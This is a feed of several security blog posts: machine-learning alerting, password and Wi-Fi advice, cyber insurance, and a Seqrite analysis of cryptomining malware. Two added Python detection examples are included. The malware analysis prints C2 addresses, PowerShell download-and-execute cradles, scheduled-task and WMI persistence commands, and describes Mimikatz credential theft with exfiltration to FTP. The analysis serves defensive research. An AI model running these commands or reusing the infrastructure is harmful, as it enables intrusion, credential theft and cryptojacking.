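"""Added example, not Cisco/Stealthwatch code: learn a per-role allowlist of
destination ports implicitly from baseline telemetry, label clusters from a
partial inventory, then alert by negation (closed world: outside the learned
set A means not-A). All telemetry below is constructed sample data."""
from collections import defaultdict

# Constructed baseline flows: (device, destination port) observed during a quiet week.
BASELINE = [
    ("prn-01", 9100), ("prn-01", 631), ("prn-01", 53),
    ("prn-02", 9100), ("prn-02", 631), ("prn-02", 53),
    ("prn-03", 631), ("prn-03", 53), ("prn-03", 9100),
    ("ws-01", 443), ("ws-01", 80), ("ws-01", 53), ("ws-01", 22),
    ("ws-02", 443), ("ws-02", 53), ("ws-02", 22), ("ws-02", 80),
]
# Partial, possibly stale inventory: only some devices carry a human label.
INVENTORY = {"prn-01": "printer", "ws-01": "workstation"}


def profiles(events):
    """device -> set of destination ports it was seen talking to."""
    prof = defaultdict(set)
    for device, port in events:
        prof[device].add(port)
    return prof


def jaccard(a, b):
    """Similarity of two port sets; 0.0 when both are empty."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def cluster(prof, threshold=0.6):
    """Greedy grouping: a device joins the first role whose members look alike."""
    roles = []  # [(member set, union of member ports)]
    for device, ports in prof.items():
        for members, allowed in roles:
            if any(jaccard(ports, prof[m]) >= threshold for m in members):
                members.add(device)
                allowed.update(ports)
                break
        else:
            roles.append(({device}, set(ports)))
    return roles


def build_model(events, inventory):
    """device -> (role label, allowed ports). The label comes from any labelled
    member of the cluster; otherwise an opaque cluster id is used."""
    model = {}
    for i, (members, allowed) in enumerate(cluster(profiles(events))):
        label = next((inventory[m] for m in sorted(members) if m in inventory), f"cluster-{i}")
        for m in members:
            model[m] = (label, frozenset(allowed))
    return model


def check(model, device, port):
    """Return None when the flow is inside the role's learned set A, otherwise an
    alert tuple: the flow is not-A for a device of that role."""
    if device not in model:
        return ("unknown-device", device, port)
    label, allowed = model[device]
    return None if port in allowed else (label, device, port)


if __name__ == "__main__":
    model = build_model(BASELINE, INVENTORY)
    print(check(model, "prn-02", 443))  # ('printer', 'prn-02', 443): a printer browsing the web
```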

Useful info for your day-to-day tasks

I had gone my entire career measuring humans as if they were machines, and now I am measuring humans as humans. We cannot forget that, no matter how fancy we get with the data science, if a human in the end will need to understand and possibly act on this information, the result must be understandable to them. I had gone my entire career thinking that the data science could explain the results, and while this is academically accurate, it is not helpful to the person who needs to understand the analytical outcome. The sense-making of the data is squarely in the domain of human understanding, and this is why the only question we want to ask is “Was this alert helpful?” Yes or no. And that’s exactly what we do with Stealthwatch. At the end of the day, we want to make sure that the person behind the console understands why an alert was triggered and whether that helped them. If the “yeses” we’ve received scoring in the mid 90%’s quarter after quarter are any indication, then we’ve been able to help a lot of users make sense of the alerts they’re receiving and use their time more efficiently.

Conclusion

We owe a big round of applause to artificial intelligence for birthing the child we know and love, named machine learning, and all that it has contributed to security analytics over the past year. We remain pragmatic in its application, as we know that, just because it is the new kid on the block, we cannot turn our backs on simple or complex lists of rules, simple statistical analysis, and any other method that has got us to where we are today.

Lucky for us, machine learning has already shown signs of playing well with its peers as we continue to find ways to improve existing security processes through pairing them with ML. It can’t solve every single problem on its own, but when it works together with the people and processes that have come before it, we get that much closer to a more secure future. And if Machine Learning is the child of AI, who then are its brothers and sisters that we have yet to explore in Security Analytics? We have some big ideas and some already in prototype state, but remember, in the end, we will ask you if it is helpful or not helpful, not all the data science mumbo jumbo!

As always, we welcome your comments below. Readers who enjoyed this blog would also benefit from viewing our library of recent Cybersecurity Reports or checking out our new Threat of the Month blog series.

The post The State of Machine Learning in 2019 appeared first on Cisco Blog.

Protect Your Digital Life: Why Strong Passwords Matter

Over the years, our lives have become more and more digital. Think about it: 20 years ago, no one was using banking apps and social media had just barely begun coming to fruition. Now, many of us are reliant on mobile banking to pay our bills and we check our favorite social media platforms multiple times a day. Our lives exist almost entirely online with our sensitive personal data shielded by password protection — from our financials to our official documentation, personal photos and more. With so much of our personal data relying on the strength of our online passwords, it’s vital that users stay up-to-date on the latest password security practices. As we take the time to recognize World Password Day, it’s important to think about why passwords matter and how you’re safeguarding your personal information online.


Think about all of the online data you have that is password protected: your email, your social media accounts, your online banking profile, your movie and TV streaming service, the list goes on and on. If you aren’t following best practices for password security and just one of your passwords is exposed or breached, this could potentially lead to cybersecurity turmoil. For example, an Android app that helped users find and connect to free Wi-Fi hotspots recently left its database of more than 2 million network passwords exposed. While the app claimed to only share public hotspots, many were found to be home wireless networks thanks to the precise GPS location data that was also stored in the database. Now imagine that one of the victims of this password exposure utilized the same credentials for their online banking profile. If their password ended up in the wrong hands, a cybercriminal could potentially access the user’s financial data, leading to fraudulent charges or even identity theft. As you can see, creating a strong and unique password could mean the difference between keeping your online data safe and being at risk of a cyberattack.

Many people just go through the motions when creating passwords instead of taking the time to consider what exactly their credentials are protecting. World Password Day is the perfect opportunity to be diligent about revamping passwords. Check out the following tips to take your password security to the next level:

  • See if your passwords have been exposed. Go to a site such as Have I Been Pwned to see if your password(s) have been compromised in a breach. Change them if you find that your credentials may have been jeopardized.
  • Layer up your passwords. Passwords should always contain a variety of capital and lowercase letters, numbers, and symbols. Today, many systems enforce password requirements during the account set-up process to ensure password strength.
  • Choose unique passwords across all of your accounts. Many consumers utilize the same password, or variations of it, across all of their accounts. This means if a hacker discovers just one password, all personal data is suddenly at risk. Therefore, it is crucial to diversify your passcodes to ensure hackers cannot obtain access to all of your accounts at once, should one password be compromised.
  • Use a password manager. Since it can be difficult to remember multiple complex passwords, use a password manager to keep track. With password managers, you’ll only need to remember one master password in order to access the rest. Many password managers can also generate strong passwords to utilize when creating new logins.
  • Enable two or multi-factor authentication. Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Protect Your Digital Life: Why Strong Passwords Matter appeared first on McAfee Blogs.

Inside the Government Cybersecurity Landscape: Federal vs. State Level Challenges

Few would dispute the idea that an effective cybersecurity profile requires candid assessments of potential vulnerabilities. Here’s a closer look at the challenges facing the federal cybersecurity mission and the efforts of state-level agencies. Federal: Though the federal government demonstrates an ongoing commitment to ramping up its cybersecurity mission with annual spending in the tens […]

The post Inside the Government Cybersecurity Landscape: Federal vs. State Level Challenges appeared first on The State of Security.

Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed

Logging onto a free Wi-Fi network can be tempting, especially when you’re out running errands or waiting to catch a flight at the airport. But this could have serious cybersecurity consequences. One popular Android app, which allowed anyone to search for nearby Wi-Fi networks, was recently left exposed, leaving a database containing over 2 million network passwords unprotected.

How exactly were these passwords exposed? The app, which had been downloaded by millions of users, allowed anyone to search for Wi-Fi networks in their area. The app also lets users upload their Wi-Fi network passwords from their devices to its database for others to use. When the database was left exposed and unprotected, anyone could access and download its contents. Each record in the database contained the Wi-Fi network name, its precise geolocation, its basic service set identifier, and the network password in plaintext. Because the app didn’t require users to obtain permission from the network owner, it would be quite easy for a cybercriminal to modify router settings and point unsuspecting users to malicious websites. What’s more, a threat actor could also read unencrypted traffic that goes across a wireless network, allowing them to steal passwords and private data.

Thankfully, the web host was able to take down the database containing the Wi-Fi passwords within a day of being notified. But it’s important for users to be aware of the cybersecurity implications that free or public Wi-Fi presents. Check out the following tips to help protect your data:

  • Change your Wi-Fi password. If you think your password may have been affected by this exposure, err on the side of caution and reset it. Be sure to make your new password complex and unique.
  • Keep your network password private. Wi-Fi networks could be susceptible to a number of threats if their passwords are left in the wrong hands. Only share your passwords with family, friends, and those you trust, and never upload your password to a public database for strangers to use.
  • Safeguard your online privacy. Use a security solution like McAfee Safe Connect to encrypt your online activity, protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed appeared first on McAfee Blogs.

What This Report on Cyber Risk Gets Wrong

The Marsh brokerage unit of Marsh and McLennan recently announced a new evaluation process called Cyber Catalyst designed to determine the usefulness of enterprise cyber risk tools.

The goal of the new offering is to identify and implement industry-wide standards to help cyber insurance policyholders make more informed decisions about cyber-related products and services; basically, what works and what doesn’t. Other major insurers participating in Cyber Catalyst include Allianz, AXA XL, AXIS, Beazley, CFC, and Sompo International.

While this collaboration between insurance companies is unusual, it’s not entirely surprising. Cyber insurance is a $4 billion market globally. While it’s difficult to accurately gauge how many hacking attempts were successfully foiled by the products targeted here, data breaches and cyber attacks on businesses continue to increase in frequency and severity. The 2019 World Economic Forum’s Global Risks Report ranks “massive data fraud and theft” as the fourth greatest global risk, followed by “cyber-attacks” in the fifth slot.

Meanwhile, cybersecurity products and vendors have been, to be charitable, a mixed bag.

Good in Theory

From this standpoint, Cyber Catalyst seems like not just a good idea, but an obvious one. A standardized metric to determine which cybersecurity solutions are no better than a fig leaf and which ones provide real armor to defend against cyberattacks is sorely lacking in the cybersecurity space. By Marsh’s own estimates, there are more than three thousand cybersecurity vendors amounting to a $114 billion marketplace. Many of them don’t inspire confidence on the part of businesses.

Insurers have a vested interest in determining the effectiveness of cybersecurity products, weeding out buggy software and promoting effective solutions that can help address risk aggregation issues. Businesses and their data are in turn better protected, and at least in theory, they would pay less for coverage. Everyone wins.

Insurance companies did something similar in the 1950s with the creation of the Insurance Institute for Highway Safety. In the face of rising traffic collisions and fatalities, the insurance industry collaborated to establish a set of tests and ratings for vehicles, and the result has been a gold standard for automotive safety for decades. Using a similar strategy for cybersecurity would at least in theory help mitigate the ever-increasing costs and risks to companies and their data.

Or Maybe Not

Where the analogy to the Insurance Institute for Highway Safety breaks down is here: the threats to car drivers and passengers have ultimately stayed the same since its inception. Everything we’ve learned over the years about making cars has progressively led to safer vehicles. Information technology is vastly different in that iterative improvements in one specific area don’t necessarily make an organization as a whole safer or better protected against cyber threats; in fact, sometimes they can have the opposite effect, when a newly added feature turns out to be a bug.

Cyber defenses are meaningless in the presence of an unintended, yet gaping, hole in an organization’s defenses. Then there is the march of sound innovation. Products that provided first-in-class protection for a business’s network a few years ago may no longer be so great where cloud computing and virtual servers, or BYOD are concerned. The attackable surface of every business continues to increase with each newly introduced technology, and it seems overly optimistic to assume the standard evaluation process (currently twice a year) would be able to keep pace with new threats.

There’s also the risk of putting too many eggs into one basket. While the diffuse nature of the cybersecurity market causes headaches for everyone involved, establishing a recommended solution or set of solutions effectively makes them an ideal target for hackers. While it’s important to keep consumers and businesses informed of potential risk to their information, cybersecurity issues require a certain amount of secrecy until they have been properly addressed. Compromising, or even identifying and reporting on a vulnerability before it’s been patched in an industry standard security product, process or vendor practice could cause a potentially catastrophic chain reaction for cyber insurers and their clients.

Culture Eats Strategy for Breakfast

Where the Cyber Catalyst program seems to potentially miss the mark is by overlooking the weakest link in any company’s security (i.e., its users). An advanced cybersecurity system or set of tools capable of blocking the most insidious and sophisticated attack can readily be circumvented by a spear phishing campaign, a compromised smartphone, or a disgruntled employee. Social engineering cannot be systematically addressed. Combatting the lures of compromise requires organizations to foster and maintain a culture of privacy and security.

The risk of employee over-reliance on tools and systems at the expense of training, awareness, and a company culture where cybersecurity is front and center must not be underestimated. While it is easier to opt for the quick and easy approach of purchasing a recommended solution, companies still need a comprehensive and evolving playbook to meet the ever-changing tactics of persistent, sophisticated and creative hackers.

While industry-wide cooperation may be a good thing, it’s vital for companies and insurers alike to recognize that any security program or service is fallible. Without an equal investment in functional cybersecurity, which places as much store in training employees and keeping aware of new threats, the rise in breaches and compromises will continue.

This article originally appeared on Inc.com.

The post What This Report on Cyber Risk Gets Wrong appeared first on Adam Levin.

Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’

As adults, we know the importance of strong passwords, and we’ve likely preached the message to our kids. But let’s rewind for a minute. Do our kids understand why strong passwords are important and why they need to become a habit, much like personal health and hygiene?

If we want the habit to stick, the reason why can’t be simply because we told them so. We’ve got to make it personal and logical.

Think about the habits you’ve already successfully instilled and the reasoning you’ve attached to them.

  • Brush your teeth to prevent disease and so they don’t fall out.
  • Eat a balanced diet so you have fuel for the day and to protect yourself from illness and disease.
  • Get enough sleep to restore your body and keep your mind sharp for learning.
  • Bathe and groom to wash away germs (and to keep people from falling over when you walk by).

The same reasoning applies to online hygiene: We change our passwords (about every three months) to stay as safe as possible online and protect what matters. When talking to kids, the things that matter include our home address, our school name, our personal information (such as a parent’s credit card information, our social security number, or other account access).

Kids Targeted

We falsely believe that an adult’s information is more valuable than a child’s. On the contrary, given a choice, 10 out of 10 hackers would mine a child’s information over an adult’s because it’s unblemished. Determined identity thieves will use a child’s Social Security number to apply for government benefits, open bank and credit card accounts, apply for a loan or utility service, or rent an apartment. Also, once a child’s information is hacked, a thief can usually get to a parent’s information.

How to Stay Safe

It’s a tall task to prevent some of the massive data breaches in the news that target kids’ information. However, what is in our control is the ability to practice and teach healthy password habits in our home.

Tips for Families

Shake it up. According to McAfee Chief Consumer Security Evangelist Gary Davis, to bulletproof your passwords, make sure they are at least 12 characters long and include numbers, symbols, and upper and lowercase letters. Consider substituting numbers and symbols for letters, such as zero for “O” or @ for “A”.

Encourage kids to get creative and create passwords or phrases that mean something to them. For instance, advises Gary, “If you love crime novels you might pick the phrase: ILoveBooksOnCrime. Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as 1L0VEBook$oNcRIM3!”

Three random words. Password wisdom has morphed over the years as we learn more and more about hacking practices. According to the National Cyber Security Centre, another way to create a strong password is by using three random words (not birthdates, addresses, or sports numbers) that mean something to you. For instance: ‘lovepuppypaws’ or ‘drakegagacardib’ or ‘eatsleeprepeat’ or ‘tacospizzanutella’.

More than one password. Creating a new password for each account will head off cybercriminals if any of your other passwords are cracked. Consider a password manager to help you keep track of your passwords.

Change product default passwords immediately. If you purchase products for kids such as internet-connected gaming devices, routers, or speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

When shopping online, don’t save info. Teach kids that when shopping on their favorite retail or gaming sites, not to save credit card information. Saving personal information to different accounts may speed up the checkout process. However, it also compromises data.

Employ extra protection. Comprehensive security software can protect you from several threats such as viruses, identity theft, privacy breaches, and malware designed to grab your data. Security software can cover your whole family as well as multiple devices.

Web Advisor. Keep your software up-to-date with a free web advisor that helps protect you from accidentally typing passwords into phishing sites.


Use unique passwords and MFA. This is also called “layering up.” 1) Use unique passwords for each of your accounts. By using different passwords, you avoid having all of your accounts become vulnerable if you are hacked (think domino effect). 2) MFA is Multi-Factor Authentication (also called two-step verification or authentication). MFA confirms a user’s identity only after they present two or more pieces of evidence. Though not 100% secure, this practice adds a layer of security to an account.

Keep it private. Kids love to show one another loyalty by sharing passwords and giving one another access to their social network accounts. DO NOT encourage this behavior. It’s reckless and could carry some serious privacy consequences. (Sharing with parents, of course, is recommended.)

Credential Cracking

According to the Identity Theft Resource Center® (ITRC), the reported number of consumer records exposed containing sensitive personally identifiable information jumped 126 percent in 2018. The report explicitly stated password cracking as an issue: “The exploitation of usernames and passwords by nefarious actors continues to be a ripe target due to the increase in credential cracking activities – not to mention the amount of data that can be gleaned by accessing accounts that reuse the same credentials.”

May 2 is World Password Day and the perfect time to consider going over these password basics with your family.

The post Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’ appeared first on McAfee Blogs.

Miners snatching open source tools to strengthen their malevolent power!

Estimated reading time: 10 minutes

Over the past year, Quick Heal Security Labs has observed a rise in the number of mining malware samples. One way to earn cryptocurrency is to mine it. Cryptocurrency miner malware has become a hot attack vector for cybercriminals because of its ease of deployment and instant return on investment. We usually observe such miners arriving through a variety of delivery techniques. Rather than writing their own modules from scratch, attackers can download the original open-source software and modify it slightly.

In this blog post, we talk about a couple of cases where the attack scenario is built on top of these open-source tools. We also talk about how the trend of abusing open-source tools to build new malware is helping malware authors.

The trend is observed especially in cryptojacking cases. Though cryptojacking is a direct source of income for cybercriminals, information stolen from victims’ systems can yield additional money for them. So these open-source tools are used for various purposes, such as download frameworks, information stealing, crypto-mining, DNS changers, Mirai bots and many more. This has helped a lot in forming botnets of similar hosts to produce more hashes per second. Often such open-source tools are readily available on GitHub and similar platforms. We can classify them as exploit frameworks, vulnerability scanners, password stealers, privilege escalators, evaders, etc.


Infection vector:

We received a miner downloader which downloads multiple components of the attack. This script may reach a system through spam mails, malicious URLs, free software bundlers or any other conventional method used by malware. We also suspect that a PowerShell script is the initial culprit. The behaviour of the miner is somewhat recursive in nature, so we could not confirm its initial trace on the system.


Technical Analysis:

Fig. 1 Working of miner

The miner downloader creates a file named 'xpdown.dat' which contains the IP addresses of the C2 servers from which it downloads further components.

45.58.135.106
103.95.28.54
103.213.246.23
74.222.14.61
Ok.xmr6b.ru

It then downloads the following files from the domains:

hxxp://45.58.135.106/xpdown.dat
hxxp://45.58.135.106/down.html
hxxp://45.58.135.106/ok/64.html

64.html contains the IP address (174.128.248.10) from which the CPU miner is downloaded.

hxxp://45.58.135.106/kill.txt

kill.txt contains the following list of processes to kill if they are running on the victim machine.

lsmose.exe, lsmos.exe, conime.exe, lsmosee.exe, 1.exe, lsazs.exe, tasksche.exe, Zationa.exe, csrs.exe, shennong.bat, svshpst.exe, Spoolvs.exe, svchsot.exe, xmrig.exe, srvany.exe, WinSCV.exe, csrswz.exe, csrs.exe, seser.exe, severxxs.exe, mssecsvc.exe, mssecsvr.exe, dsbws.exe


The malware then downloads a text file which contains the locations of multiple payloads to be downloaded.

hxxp://45.58.135.106/down.txt

down.txt contains the following links (with the location each file is dropped at). The malware then opens TCP port 32381 on the system.

hxxp://213.183.45.201/downs.exe              (C:\windows\system\downs.exe)
hxxp://66.117.6.174/ups.rar                         (C:\windows\system\cab.exe)
hxxp://213.183.60.7/b.exe                            (C:\windows\inf\msief.exe)
hxxp://174.128.239.250/item.dll                 (C:\windows\debug\item.dat)

Looking at the links in the file, we observed the following.

Downs.exe is a modified version of Microsoft's CACLS (which displays and modifies access control lists). Ups.rar is downloaded as cab.exe; this component is a downloader for the Windows variant of the Mirai botnet. It also acts as a DNS changer and opens a backdoor on the system. On execution it performs multiple operations, such as modifying the DNS entry on the host to the IP "223.5.5.5", which is geolocated in China and belongs to the ISP "Hangzhou Alibaba Advertising Co.,Ltd."

Fig. 2 Windows Server check

It then checks whether the compromised machine is a Windows server by calling GetVersionExA. If the machine is a server, it downloads update.txt from the C2 server and drops it at "C:\windows\system\uplist.txt". uplist.txt contains the following payloads to be downloaded and executed.

hxxp://66.117.6.174/wpd.jpg                     (C:\windows\system\msinfo.exe)
hxxp://66.117.6.174/my1.html                   (C:\windows\system\my1.bat)

It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll. These files are used for network packet processing and are loaded by msinfo.exe during its execution.

Let’s look into these components one by one.

my1.bat:

It contains code that is very stealthy and evasive, as it uses several techniques such as "Squiblydoo", a PowerShell download cradle and WMI event subscription persistence to run malicious content on infected machines.

The WMI script contains multiple PowerShell scripts.

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://173.208.139.170/s.txt')

This text file contains another PowerShell downloader as follows:

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://74.222.1.38/up.txt')

"Up.txt" contains code which collects information about the system OS, physical memory and the list of running processes using WMI classes, and then downloads the PowerShell version of Mimikatz from GitHub.

It then steals the credentials from the compromised machine and uploads them to the FTP server at IP 192.187.111.66 using hard-coded FTP credentials.

Fig. 3 Victims Data in FTP Server.

Msinfo.exe:

It is basically a Windows version of the Mirai botnet, as much of its code matches the previously leaked Mirai source code. On execution with the command line parameters "-create" and "-run", it checks the architecture of the current system (x86, MIPS, ARM, etc.). Based on that identification, it checks for its latest update and downloads it if available.

It performs the following tasks as instructed by an encrypted file downloaded from the C2 server.

  1. Implements a spreader mechanism using blind SQL injection (SQLi) and brute-force attacks built on a cracking library and the Hydra tool:
     [Cracker:Telnet] [Cracker:MSSQL] [Cracker:CCTV] [Cracker:MS17010], CrackerWMI, CrackerSSH
  2. Scans ports such as 80, 8000 and 445 using masscan (a very fast open source port scanner that operates much like nmap, the popular port scanning tool):
     https://github.com/robertdavidgraham/masscan
  3. Disables specific services by invoking the following command:
     C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm start= disabled&sc stop NlaSvc&sc config NlaSvc start=disabled
  4. Performs a network scan: it collects the public and private IP of the system along with associated information such as geolocation, spoofs its own IP against the current system IP and uses masscan to scan other devices.

Through these steps it converts the system into a bot and adds it to the bot network. The code has been developed in C++ and is distributed across many source files, such as:

CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
CThreadPool.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
cService.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp
WPD.cpp

It mainly targets IoT devices running embedded Linux, so it uses BusyBox (a software suite that provides UNIX utilities, also called the Swiss Army Knife of embedded Linux) to execute remote commands after compromising those devices through the methods mentioned above.


VBS/BAT Agent For Download Miner:

First the payload is dropped and executed at the following location on the victim machine.

hxxp://213.183.60.7/b.exe (downloaded to C:\windows\inf\msief.exe)

On execution, it drops a VBS file and a batch file at the locations below and executes the VBS file by invoking wscript.exe, which in turn executes the bat file.

C:\Windows\web\c3.bat
C:\Windows\web\n.vbs

The bat file contains a lot of code: it modifies the attributes of some folders and files, kills specific processes, deletes some files, modifies the access control of some folders and files, establishes persistence for multiple payloads via the registry, the task scheduler and WMI event subscription, and also modifies the firewall policy to block ports 445 and 139.

Fig. 4 Part of C3.bat code

Two more additional payloads are downloaded from one of the C2 servers listed in xpdown.dat. One is a disk writer, a DLL dropped at "C:\Windows\debug". It executes at system start, as the above bat file adds a task scheduler entry for it:

schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F

The second one is the final payload, the XMRig Monero miner, a 64-bit executable downloaded from hxxp://174.128.248.10/64.rar to "C:\windows\debug\lsmos.exe".

On execution it unpacks itself and drops three files in the current execution folder: an executable (lsmose.exe, 64-bit, packed with VMProtect) and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll) which the miner needs to run.

In another similar case we observed a base64-encoded PowerShell script, a cryptomining malware hiding in a WMI class to evade AV and most security products thanks to this stealthy and unusual technique.

After decoding we get the following code:

Fig. 5 Base64 decoded script

The basic workflow of the malware is as follows.

Fig. 6 Basic workflow of miner with WMI class

On execution, it checks whether the IP/domain mentioned in the code is alive. If it is available, it requests a banner and receives the response 'SCM Event1 Log'.

Fig. 7 Request for “banner” and another PowerShell Payload

After that the malware queries the '__FilterToConsumerBinding' WMI class by executing the command below

$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding))

and then checks whether the result contains 'SCM Event1 Log'. If it is not present, it downloads and executes in6.ps1 (64-bit) or in3.ps1 (32-bit) via Invoke-Expression (IEX).

Fig. 8 Request for PowerShell script

in6.ps1/in3.ps1:

These scripts consist of two parts: the first is a base64-encoded gzip data stream and the second contains obfuscated code. After de-obfuscation, the code resembles the initial base64-encoded script with additional features.

Fig 9 decoded in6.ps1

The encoded gzip contains four files as mentioned below:

  1. ‘mini’ – Mimikatz, a credential stealer
  2. ‘mon’ – Monero CPU Miner
  3. 'funs' – A collection of functions, including one to execute a remote DLL via WMI and an EternalBlue vulnerability scanner.
  4. 'sc' – Shellcode to execute on other systems and download the same payload, if they are vulnerable to EternalBlue.

It creates a WMI Class “systemcore_Updater0” under the Namespace “root\default” and adds properties like mimi, mon, funs, sc, ipsu and i17.

Fig 10 Properties of WMI Class “systemcoreUpdater0”

Then it sets filtername="SCM Event1 Log Filter" and consumername="SCM Event1 Log Consumer".

When an attacker uses WMI as a persistence mechanism, instances of __EventFilter, __EventConsumer and __FilterToConsumerBinding have to be created, and an __InstanceCreationEvent is fired.

In this case, the attacker uses the following query as the event filter and binds it to the initial base64-encoded script, which is then executed approximately every 3 hours.

SELECT * FROM __InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System
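A defender-side triage of root\subscription bindings for the persistence pattern described above (both the my1.bat WMI event subscription and this case's "SCM Event1 Log" filter). This is an added example, not Seqrite's code: the binding records are constructed to mirror the artefacts listed in this post, and the benign "SCM Event Log" binding is modelled on the one Windows ships by default.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Consumer classes that execute code when their filter fires.
ACTIVE_CONSUMER_CLASSES = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}

# Payload indicators matching the download cradle / encoded PowerShell seen in my1.bat.
PAYLOAD_PATTERNS = [
    (re.compile(r"powershell", re.I), "PowerShell launched from a WMI consumer"),
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), "Invoke-Expression"),
    (re.compile(r"DownloadString|Net\.WebClient", re.I), "download cradle"),
    (re.compile(r"-enc(odedcommand)?\b|FromBase64String", re.I), "base64-encoded command"),
    (re.compile(r"regsvr32.*scrobj", re.I), "Squiblydoo (regsvr32/scrobj)"),
]

# Event sources that make a filter behave like a timer rather than react to a real event.
TIMER_CLASSES = ("Win32_PerfFormattedData_PerfOS_System", "Win32_LocalTime", "Win32_UTCTime")


@dataclass
class Binding:
    filter_name: str
    query: str            # WQL of the __EventFilter
    consumer_name: str
    consumer_class: str
    payload: str          # CommandLineTemplate or ScriptText of the consumer


@dataclass
class Finding:
    binding: str
    reasons: List[str] = field(default_factory=list)


def polling_interval(query: str) -> Optional[int]:
    """Return the WITHIN interval (seconds) of a WQL filter, or None if it has none."""
    m = re.search(r"\bWITHIN\s+(\d+)", query, re.I)
    return int(m.group(1)) if m else None


def assess(b: Binding) -> Finding:
    """Collect the reasons why one filter/consumer binding looks like persistence."""
    f = Finding(binding=f"{b.filter_name} -> {b.consumer_name}")
    if b.consumer_class not in ACTIVE_CONSUMER_CLASSES:
        return f                        # log/SMTP consumers cannot run code
    for pattern, why in PAYLOAD_PATTERNS:
        if pattern.search(b.payload):
            f.reasons.append(why)
    for cls in TIMER_CLASSES:
        if cls.lower() in b.query.lower():
            f.reasons.append(f"timer-style filter on {cls}")
    interval = polling_interval(b.query)
    if interval is not None and interval >= 600:
        f.reasons.append(f"long polling interval (WITHIN {interval}s)")
    return f


def suspicious(bindings: List[Binding]) -> List[Finding]:
    """Return only the bindings that collected at least one reason."""
    return [f for f in map(assess, bindings) if f.reasons]


# Constructed records, as a defender might export them from root\subscription.
SAMPLE_BINDINGS = [
    # Modelled on the binding Windows ships by default (the name the malware imitates).
    Binding("SCM Event Log Filter", "select * from MSFT_SCMEventLogEvent",
            "SCM Event Log Consumer", "NTEventLogEventConsumer", ""),
    # Ordinary administrative automation: reacts to a real event, runs a local batch file.
    Binding("Svc Stopped",
            "SELECT * FROM __InstanceModificationEvent WITHIN 30 "
            "WHERE TargetInstance ISA 'Win32_Service' AND TargetInstance.State='Stopped'",
            "Notify Ops", "CommandLineEventConsumer", r"cmd.exe /c C:\ops\notify.bat"),
    # The pattern from this post: look-alike name, ~3 h timer, encoded PowerShell.
    Binding("SCM Event1 Log Filter",
            "SELECT * FROM __InstanceModificationEvent WITHIN 10600 "
            "WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System",
            "SCM Event1 Log Consumer", "CommandLineEventConsumer",
            "powershell.exe -NoP -W Hidden -EncodedCommand <constructed-base64-placeholder>"),
]

if __name__ == "__main__":
    for finding in suspicious(SAMPLE_BINDINGS):
        print(finding.binding)
        for reason in finding.reasons:
            print("  -", reason)
```

Only the look-alike "SCM Event1 Log" binding is reported; the default Windows binding and the event-driven admin task pass clean.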

Fig 11 Initial PS script hidden in WMI Class

It tries to delete the task scheduler entry "sysupdater0" and also checks for "sysupdater0.bat" in %systemroot%, removing it if it exists.

It modifies the Windows sleep, hibernate and power plan settings by invoking the following commands:
powercfg /CHANGE -standby-timeout-ac 0
powercfg /CHANGE -hibernate-timeout-ac 0
powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

It removes all WMI objects in the __FilterToConsumerBinding class under the namespace "root\subscription" whose filter name does not match "SCM Event0 Log".

Then it kills any process that has an "ESTABLISHED" connection on port 3333, 5555 or 7777.

It makes a list of the PIDs of running "PowerShell" processes and of the network connections on the system. It then checks for a process with an "ESTABLISHED" connection on port 80, 14444, 14433 or 443. If no such process exists and fewer than 8 PowerShell processes are running, it executes the Monero miner using the "funs" module. After that it executes Mimikatz and dumps credentials regardless of whether the Monero miner was executed.

It also enumerates the network addresses, checks which IPs are active and adds them to the property named 'ipsu'. It then scans those IPs to identify systems vulnerable to MS17-010 (with the EternalBlue scanner script), stores them in the property 'i17' and finally executes shellcode which downloads ze3.ps1 or ze6.ps1, equivalent to in3.ps1 or in6.ps1, depending on the OS architecture.

Fig 12 Shell code executed by invoking “WinExec”

The shellcode downloads and executes the PS script to infect other vulnerable systems. In this way it spreads to, and mines on, other systems in the network.

So in both cases, open source tools are abused heavily to carry out the attack. Mimikatz, masscan and the EternalBlue vulnerability scanner appear to be popular tools among malware authors. Similar techniques are also used for spreading ransomware. Seqrite successfully detects such attacks at various detection levels.


Indicator of Compromise:


Subject Matter Expert:

Priyanka Shinde, Goutam Tripathy, Vallabh Chole
Security Labs, Quick Heal Technologies, Ltd.

The post Miners snatching open source tools to strengthen their malevolent power! appeared first on Seqrite Blog.
